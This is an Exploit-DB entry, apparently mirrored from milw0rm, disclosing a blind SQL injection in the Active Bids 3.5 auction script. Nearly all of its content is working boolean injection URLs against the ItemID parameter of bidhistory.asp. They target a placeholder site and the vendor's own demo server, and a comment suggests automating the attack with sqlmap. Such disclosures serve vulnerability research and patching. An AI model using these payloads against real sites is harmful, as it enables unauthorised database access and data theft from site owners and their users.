Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability

EDB-ID: 7290	CVE: 2008-5640	OSVDB-ID: 50399
Author: Stack	Published: 2008-11-29	Verified:
Exploit Code:	Vulnerable App: N/A

 [~]Tybe     : Remote Blind SQL Injection Vulnerability
 [~]Vendor   : www.activewebsoftwares.com
 [~]Software : Active Bids
 [~]author   : Mountassif Moad
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1
http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0
Demo :
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1
http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0
# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
# milw0rm.com [2008-11-29]

Comments

Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability

Rating

No comments so far